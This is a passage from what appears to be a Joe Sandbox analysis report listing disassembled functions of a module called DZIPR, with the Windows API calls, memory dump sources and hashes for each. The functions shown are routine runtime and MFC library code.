                                          • Associated: 00000017.00000002.2588762108.000000006FAE8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_23_2_6fac0000_DZIPR.jbxd
                                          Similarity
                                          • API ID: CriticalSection$Enter$AddressException@8FreeH_prolog3H_prolog3_catchInitializeLeaveLibraryProcThrow
                                          • String ID: HtmlHelpW$hhctrl.ocx
                                          • API String ID: 2853499158-3773518134
                                          • Opcode ID: 9f95cd1c656c943c6e0f69a5dff3004c37774b18448987dabfab57b0a1c92eb6
                                          • Instruction ID: 9c7631dffb876fc8f3b0111e54317343db09bb4e5b5dd429ecab78fbd99e9134
                                          • Opcode Fuzzy Hash: 9f95cd1c656c943c6e0f69a5dff3004c37774b18448987dabfab57b0a1c92eb6
                                          • Instruction Fuzzy Hash: 9301D6B1144706ABE7115F74CE04B6B3BE0AF04369F04C514F45A99190DB7DE4D0D752
                                          Function 6FADED77 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • GetModuleHandleA.KERNEL32(KERNEL32,6FAD77D7), ref: 6FADED7C
                                          • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 6FADED8C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.2588653637.000000006FAC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FAC0000, based on PE: true
                                          • Associated: 00000017.00000002.2588635705.000000006FAC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588762108.000000006FAE8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_23_2_6fac0000_DZIPR.jbxd
                                          Similarity
                                          • API ID: AddressHandleModuleProc
                                          • String ID: IsProcessorFeaturePresent$KERNEL32
                                          • API String ID: 1646373207-3105848591
                                          • Opcode ID: b709fe504820698f4f54fd2b4dc40a0e6bbb29da940741c57457b3130cc4037a
                                          • Instruction ID: cd7f31e1dccc591a3ead6d749fa9b38ad563527af1e4e4215146ed2198784cc6
                                          • Opcode Fuzzy Hash: b709fe504820698f4f54fd2b4dc40a0e6bbb29da940741c57457b3130cc4037a
                                          • Instruction Fuzzy Hash: CCF03A30A00A09D2EF002FB1ED596AFBF7ABF82756F824990E1D6A1084DF3494F1E355
                                          Function 6FAC7D71 Relevance: 6.1, APIs: 4, Instructions: 131timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.2588653637.000000006FAC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FAC0000, based on PE: true
                                          • Associated: 00000017.00000002.2588635705.000000006FAC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588762108.000000006FAE8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_23_2_6fac0000_DZIPR.jbxd
                                          Similarity
                                          • API ID: File$SizeTime_memset
                                          • String ID:
                                          • API String ID: 151880914-0
                                          • Opcode ID: ab7830130c5c56665932cfcf06c145150c579b1c01ea955940509a759bc2e62e
                                          • Instruction ID: 789cf580f8aeb8414f1765d48a4ea45ac70b54aee201238061f9211bb6f13b27
                                          • Opcode Fuzzy Hash: ab7830130c5c56665932cfcf06c145150c579b1c01ea955940509a759bc2e62e
                                          • Instruction Fuzzy Hash: 85510C725047059FD720CF68C94099AB7F8FF09320F148A1EE5A6D7690E738F985CB61
                                          Function 6FAE081B Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 6FAE084F
                                          • __isleadbyte_l.LIBCMT ref: 6FAE0883
                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,6FAD40D8,6FAEBF84,00000000,00000000,?,?,?,?,6FAD40D8,00000000,?), ref: 6FAE08B4
                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,6FAD40D8,00000001,00000000,00000000,?,?,?,?,6FAD40D8,00000000,?), ref: 6FAE0922
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.2588653637.000000006FAC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FAC0000, based on PE: true
                                          • Associated: 00000017.00000002.2588635705.000000006FAC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588762108.000000006FAE8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_23_2_6fac0000_DZIPR.jbxd
                                          Similarity
                                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                          • String ID:
                                          • API String ID: 3058430110-0
                                          • Opcode ID: 9bb855dab055ad040b52bd3b48f84bb0c84085ca2a7b5adbb46beca9dc7ef023
                                          • Instruction ID: dcc03c9741ca083a5add4fb7f71fa71ebd768bd2b26cd7012aeec5746cfb968e
                                          • Opcode Fuzzy Hash: 9bb855dab055ad040b52bd3b48f84bb0c84085ca2a7b5adbb46beca9dc7ef023
                                          • Instruction Fuzzy Hash: AF31A031A04245EFDB00DFA4C890AAE3BB5EF01310F09D5AAE4649B191DB34F9C1EB91
                                          Function 6FACC4CF Relevance: 6.1, APIs: 4, Instructions: 89COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.2588653637.000000006FAC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FAC0000, based on PE: true
                                          • Associated: 00000017.00000002.2588635705.000000006FAC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588762108.000000006FAE8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_23_2_6fac0000_DZIPR.jbxd
                                          Similarity
                                          • API ID: __msize_malloc
                                          • String ID:
                                          • API String ID: 1288803200-0
                                          • Opcode ID: 9fd6e97bba41206b99ddb25c295dc825b13bf19b5188b723e9e2209221d2e3f6
                                          • Instruction ID: 0d2fc72c39fecf6cddec27c7ae751cfa22a69460a5d29d8ea3b22975e955c245
                                          • Opcode Fuzzy Hash: 9fd6e97bba41206b99ddb25c295dc825b13bf19b5188b723e9e2209221d2e3f6
                                          • Instruction Fuzzy Hash: A221E671540B949FCB159F34D990E9E7BA8AF40364B14852BE8698B2D5DF3CF8C1CB82
                                          Function 6FAC88C8 Relevance: 6.1, APIs: 4, Instructions: 66memorystringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GlobalLock.KERNEL32(?), ref: 6FAC88E7
                                          • lstrcmpW.KERNEL32(00000000,?), ref: 6FAC88F4
                                          • GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 6FAC892E
                                          • GlobalLock.KERNEL32(00000000), ref: 6FAC8938
                                            • Part of subcall function 6FACDAD1: GlobalFlags.KERNEL32(?), ref: 6FACDAE0
                                            • Part of subcall function 6FACDAD1: GlobalUnlock.KERNEL32(?), ref: 6FACDAF2
                                            • Part of subcall function 6FACDAD1: GlobalFree.KERNEL32(?), ref: 6FACDAFD
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.2588653637.000000006FAC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FAC0000, based on PE: true
                                          • Associated: 00000017.00000002.2588635705.000000006FAC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588762108.000000006FAE8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_23_2_6fac0000_DZIPR.jbxd
                                          Similarity
                                          • API ID: Global$Lock$AllocFlagsFreeUnlocklstrcmp
                                          • String ID:
                                          • API String ID: 2391069079-0
                                          • Opcode ID: 1fccf8fe867eaf57fabe906bb06c5b32953c5312d2a5c48f968f76a7a52a5a4b
                                          • Instruction ID: 3c16956a216e9ab82f93793bf0698bcd7f502d4f49d6ecc885fa6e782d783384
                                          • Opcode Fuzzy Hash: 1fccf8fe867eaf57fabe906bb06c5b32953c5312d2a5c48f968f76a7a52a5a4b
                                          • Instruction Fuzzy Hash: 80118C75504A04BFCF229BA5CD48CAF7BBEFF85B05B00441AFA11E6060DB39D991E722
                                          Function 6FACBF5D Relevance: 6.1, APIs: 4, Instructions: 61COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • RtlEnterCriticalSection.NTDLL(?), ref: 6FACBFBC
                                          • RtlLeaveCriticalSection.NTDLL(?), ref: 6FACBFCC
                                          • LocalFree.KERNEL32(?), ref: 6FACBFD5
                                          • TlsSetValue.KERNEL32(?,00000000), ref: 6FACBFE7
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.2588653637.000000006FAC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FAC0000, based on PE: true
                                          • Associated: 00000017.00000002.2588635705.000000006FAC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588762108.000000006FAE8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_23_2_6fac0000_DZIPR.jbxd
                                          Similarity
                                          • API ID: CriticalSection$EnterFreeLeaveLocalValue
                                          • String ID:
                                          • API String ID: 2949335588-0
                                          • Opcode ID: 7a759ee0882573aaf8b0192f65734147b922863af03646074afe7c3eee2bb470
                                          • Instruction ID: 3349657cd22cfc94fba9715035287ed525f17c665f1559c8adf6283bf7df0a58
                                          • Opcode Fuzzy Hash: 7a759ee0882573aaf8b0192f65734147b922863af03646074afe7c3eee2bb470
                                          • Instruction Fuzzy Hash: 89115631600704EFD714CF64C884F9AB7A4FF46365F10852AE1629B6A1CB76F891CFA1
                                          Function 6FAC8EC9 Relevance: 6.1, APIs: 4, Instructions: 57threadCOMMON
                                          Download Yara Rule
                                          APIs
                                          • __EH_prolog3.LIBCMT ref: 6FAC8ED0
                                            • Part of subcall function 6FAC9C7C: __EH_prolog3.LIBCMT ref: 6FAC9C83
                                          • __wcsdup.LIBCMT ref: 6FAC8EF2
                                          • GetCurrentThread.KERNEL32 ref: 6FAC8F1F
                                          • GetCurrentThreadId.KERNEL32 ref: 6FAC8F28
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.2588653637.000000006FAC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FAC0000, based on PE: true
                                          • Associated: 00000017.00000002.2588635705.000000006FAC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588762108.000000006FAE8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_23_2_6fac0000_DZIPR.jbxd
                                          Similarity
                                          • API ID: CurrentH_prolog3Thread$__wcsdup
                                          • String ID:
                                          • API String ID: 190065205-0
                                          • Opcode ID: 092d6a57feba760643fa249f671b9d12c34938f8a0dc8357ebba13058edd62e8
                                          • Instruction ID: 20af8b2a2c6d521daf4b633fba9740b32839b36cd3cc32e9280bf90fc0ae63f3
                                          • Opcode Fuzzy Hash: 092d6a57feba760643fa249f671b9d12c34938f8a0dc8357ebba13058edd62e8
                                          • Instruction Fuzzy Hash: F7218CB0904B40CFC7219F6A824024AFBE8BFA4704F10891FD1AA87B61CBB8A081DF51
                                          Function 6FAC6A83 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • __EH_prolog3.LIBCMT ref: 6FAC6A8A
                                            • Part of subcall function 6FAC68E2: _malloc.LIBCMT ref: 6FAC6900
                                          • __CxxThrowException@8.LIBCMT ref: 6FAC6AC0
                                          • FormatMessageW.KERNEL32(00001100,00000000,?,00000800,6FAC16A6,00000000,00000000,?,?,6FAED898,00000004,6FAC16A6,00000000,6FAC69F9,00000000), ref: 6FAC6AEA
                                          • LocalFree.KERNEL32(6FAC16A6,6FAC16A6,00000000,6FAC69F9,00000000), ref: 6FAC6B12
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.2588653637.000000006FAC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FAC0000, based on PE: true
                                          • Associated: 00000017.00000002.2588635705.000000006FAC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588762108.000000006FAE8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_23_2_6fac0000_DZIPR.jbxd
                                          Similarity
                                          • API ID: Exception@8FormatFreeH_prolog3LocalMessageThrow_malloc
                                          • String ID:
                                          • API String ID: 1776251131-0
                                          • Opcode ID: f6ce87bc3c8a58d9f500ec5a3d2744a56f1382e9382817242376b6b60ac2c6bc
                                          • Instruction ID: 5d6c4bc2fd5450a5f86c74cf3e0409ecdd36a716329a1d26412c58c643a7007e
                                          • Opcode Fuzzy Hash: f6ce87bc3c8a58d9f500ec5a3d2744a56f1382e9382817242376b6b60ac2c6bc
                                          • Instruction Fuzzy Hash: 8A119E71614309AFDF04CF68CC40AB93BB5EF49310F24C529F5288B3E0E73199909B51
                                          Function 6FACD159 Relevance: 6.1, APIs: 4, Instructions: 56registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RegSetValueExW.ADVAPI32(00000000,?,00000000,00000004,?,00000004), ref: 6FACD194
                                          • RegCloseKey.ADVAPI32(00000000), ref: 6FACD19D
                                          • swprintf.LIBCMT ref: 6FACD1BA
                                          • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 6FACD1CB
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.2588653637.000000006FAC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FAC0000, based on PE: true
                                          • Associated: 00000017.00000002.2588635705.000000006FAC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588762108.000000006FAE8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_23_2_6fac0000_DZIPR.jbxd
                                          Similarity
                                          • API ID: ClosePrivateProfileStringValueWriteswprintf
                                          • String ID:
                                          • API String ID: 22681860-0
                                          • Opcode ID: a50fc6cf04bc3bf36c29de0cf6e3935f4ae9f860d6ec9a077c2e232a1e8685f7
                                          • Instruction ID: 84ac617920b39f4dff4a0c0d6817add625030e25afd321aa598b568871e07b69
                                          • Opcode Fuzzy Hash: a50fc6cf04bc3bf36c29de0cf6e3935f4ae9f860d6ec9a077c2e232a1e8685f7
                                          • Instruction Fuzzy Hash: 2501A172540309ABDB009B648D45FAB77ADAF49B24F04041AF911A7180DB79E955D7A0
                                          Function 6FAC7287 Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 6FAC68E2: _malloc.LIBCMT ref: 6FAC6900
                                          • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 6FAC72BB
                                          • GetCurrentProcess.KERNEL32(?,00000000), ref: 6FAC72C1
                                          • DuplicateHandle.KERNEL32(00000000), ref: 6FAC72C4
                                          • GetLastError.KERNEL32(?), ref: 6FAC72DF
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.2588653637.000000006FAC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FAC0000, based on PE: true
                                          • Associated: 00000017.00000002.2588635705.000000006FAC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588762108.000000006FAE8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_23_2_6fac0000_DZIPR.jbxd
                                          Similarity
                                          • API ID: CurrentProcess$DuplicateErrorHandleLast_malloc
                                          • String ID:
                                          • API String ID: 3704204646-0
                                          • Opcode ID: 564b51523ddd3647394282414c0839290f55e4f535c9667434c1af7b83326fef
                                          • Instruction ID: 814315a1013c0e2888fe418a9c3a3ad964ddaf2668a7e18ce4f049ab5f96651a
                                          • Opcode Fuzzy Hash: 564b51523ddd3647394282414c0839290f55e4f535c9667434c1af7b83326fef
                                          • Instruction Fuzzy Hash: 8D01D431700701ABDB008BA6CD88F9A7BA9EF85320F148411F518DB280DB75EC41C761
                                          Function 6FAD0F8D Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetTopWindow.USER32(?), ref: 6FAD0F9D
                                          • GetTopWindow.USER32(00000000), ref: 6FAD0FDC
                                          • GetWindow.USER32(00000000,00000002), ref: 6FAD0FFA
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.2588653637.000000006FAC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FAC0000, based on PE: true
                                          • Associated: 00000017.00000002.2588635705.000000006FAC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588762108.000000006FAE8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_23_2_6fac0000_DZIPR.jbxd
                                          Similarity
                                          • API ID: Window
                                          • String ID:
                                          • API String ID: 2353593579-0
                                          • Opcode ID: 01731e6ab838c6d23837398487cac88baf059a5f590405ba4d44633869272a43
                                          • Instruction ID: 82539486cb355787c519a28470a7c6dcaca14a68c172e1b6af859fa48bd30069
                                          • Opcode Fuzzy Hash: 01731e6ab838c6d23837398487cac88baf059a5f590405ba4d44633869272a43
                                          • Instruction Fuzzy Hash: AE01403204961ABBCF025FA18D08EDF3F26AF497A0F159011FA1055064C73AC5B2EBB1
                                          Function 6FADEC63 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.2588653637.000000006FAC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FAC0000, based on PE: true
                                          • Associated: 00000017.00000002.2588635705.000000006FAC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588762108.000000006FAE8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_23_2_6fac0000_DZIPR.jbxd
                                          Similarity
                                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                          • String ID:
                                          • API String ID: 3016257755-0
                                          • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                          • Instruction ID: f1329570335b4a14c59743fd944a18335d4b8f2cebae9af149cfa93077b642a6
                                          • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                          • Instruction Fuzzy Hash: 26118C7240028EBBCF125F84CD81CEE7F62BB08394B488415FA2858170D73ADAB1AB81
                                          Function 6FAD03CF Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetDlgItem.USER32(?,?), ref: 6FAD03DC
                                          • GetTopWindow.USER32(00000000), ref: 6FAD03EF
                                            • Part of subcall function 6FAD03CF: GetWindow.USER32(00000000,00000002), ref: 6FAD0436
                                          • GetTopWindow.USER32(?), ref: 6FAD041F
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.2588653637.000000006FAC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FAC0000, based on PE: true
                                          • Associated: 00000017.00000002.2588635705.000000006FAC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588762108.000000006FAE8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_23_2_6fac0000_DZIPR.jbxd
                                          Similarity
                                          • API ID: Window$Item
                                          • String ID:
                                          • API String ID: 369458955-0
                                          • Opcode ID: 8f98bde6bacd743747e42cea5d7dbac0a3ef702f230be3bc9fdcee8b56b6520a
                                          • Instruction ID: 5afcb66568d7c4303c8dceadab5597fc9d724c03ffa9313dd57044bfb239775d
                                          • Opcode Fuzzy Hash: 8f98bde6bacd743747e42cea5d7dbac0a3ef702f230be3bc9fdcee8b56b6520a
                                          • Instruction Fuzzy Hash: D601F732045B1A7BCF122E618E04ECF3B29AF413A0F05E021FD1499008D738D59297D5
                                          Function 6FACC220 Relevance: 6.0, APIs: 4, Instructions: 38COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • RtlEnterCriticalSection.NTDLL(6FAF34A8), ref: 6FACC25A
                                          • RtlInitializeCriticalSection.NTDLL(?), ref: 6FACC26C
                                          • RtlLeaveCriticalSection.NTDLL(6FAF34A8), ref: 6FACC279
                                          • RtlEnterCriticalSection.NTDLL(?), ref: 6FACC289
                                            • Part of subcall function 6FAC6DC1: __CxxThrowException@8.LIBCMT ref: 6FAC6DD7
                                            • Part of subcall function 6FAC6DC1: __EH_prolog3.LIBCMT ref: 6FAC6DE4
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.2588653637.000000006FAC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FAC0000, based on PE: true
                                          • Associated: 00000017.00000002.2588635705.000000006FAC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588762108.000000006FAE8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_23_2_6fac0000_DZIPR.jbxd
                                          Similarity
                                          • API ID: CriticalSection$Enter$Exception@8H_prolog3InitializeLeaveThrow
                                          • String ID:
                                          • API String ID: 2895727460-0
                                          • Opcode ID: a6003eb090ec6250cbaf3f1fdc3aea83ec0217986c493a44d34326301efaa699
                                          • Instruction ID: b7547dda339a80b443f380ce8f9d4e7a6902de94aed62e035df1c265246db531
                                          • Opcode Fuzzy Hash: a6003eb090ec6250cbaf3f1fdc3aea83ec0217986c493a44d34326301efaa699
                                          • Instruction Fuzzy Hash: 08F0F672505354AFCF00AB98DC86B55BB69EFD3376F140016F2888A241CB38A4D2CBA3
                                          Function 6FACBA5B Relevance: 6.0, APIs: 4, Instructions: 35COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • RtlEnterCriticalSection.NTDLL(6FAF32EC), ref: 6FACBA69
                                          • TlsGetValue.KERNEL32(6FAF32D0,?,?,?,?,6FACC0B7,?,00000004,6FACAF00,6FAC6DDD,6FAC68AD,?,6FAD4902,?), ref: 6FACBA7D
                                          • RtlLeaveCriticalSection.NTDLL(6FAF32EC), ref: 6FACBA93
                                          • RtlLeaveCriticalSection.NTDLL(6FAF32EC), ref: 6FACBA9E
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.2588653637.000000006FAC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FAC0000, based on PE: true
                                          • Associated: 00000017.00000002.2588635705.000000006FAC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588762108.000000006FAE8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_23_2_6fac0000_DZIPR.jbxd
                                          Similarity
                                          • API ID: CriticalSection$Leave$EnterValue
                                          • String ID:
                                          • API String ID: 3969253408-0
                                          • Opcode ID: ca5d0f3d76144e2f201ec23edfb15466701c094e6b319bbbf783a2ffe49d8170
                                          • Instruction ID: cc1913a10f77c3332327f7d6126dc4734c279cc5e10e90634b382efbedbe9118
                                          • Opcode Fuzzy Hash: ca5d0f3d76144e2f201ec23edfb15466701c094e6b319bbbf783a2ffe49d8170
                                          • Instruction Fuzzy Hash: 4FF0E9362147109FD7208F18C888C4A77BDEF853B13058515F68993100C635F892DFA1
                                          Function 6FAE057A Relevance: 6.0, APIs: 4, Instructions: 31COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • __getptd.LIBCMT ref: 6FAE0586
                                            • Part of subcall function 6FADA27F: __getptd_noexit.LIBCMT ref: 6FADA282
                                            • Part of subcall function 6FADA27F: __amsg_exit.LIBCMT ref: 6FADA28F
                                          • __getptd.LIBCMT ref: 6FAE059D
                                          • __amsg_exit.LIBCMT ref: 6FAE05AB
                                          • __lock.LIBCMT ref: 6FAE05BB
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.2588653637.000000006FAC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FAC0000, based on PE: true
                                          • Associated: 00000017.00000002.2588635705.000000006FAC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588762108.000000006FAE8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_23_2_6fac0000_DZIPR.jbxd
                                          Similarity
                                          • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                          • String ID:
                                          • API String ID: 3521780317-0
                                          • Opcode ID: e80f80e63e4160f0049589f6a3882bfea6aa3908221cd81d98c70f1bf86a9bb4
                                          • Instruction ID: 149f64164e3ad0d59d16c8bc1722132e5d6534dbfbacc139ccdd1d69e175504c
                                          • Opcode Fuzzy Hash: e80f80e63e4160f0049589f6a3882bfea6aa3908221cd81d98c70f1bf86a9bb4
                                          • Instruction Fuzzy Hash: 05F0B472901710CFDB20ABB8860174C33E5AF00728F45D55AE480AB2E0CF3CA9C2EFA1
                                          Function 6FACA698 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 6FACA59C: GetModuleHandleW.KERNEL32(KERNEL32,6FACA6B6), ref: 6FACA5AA
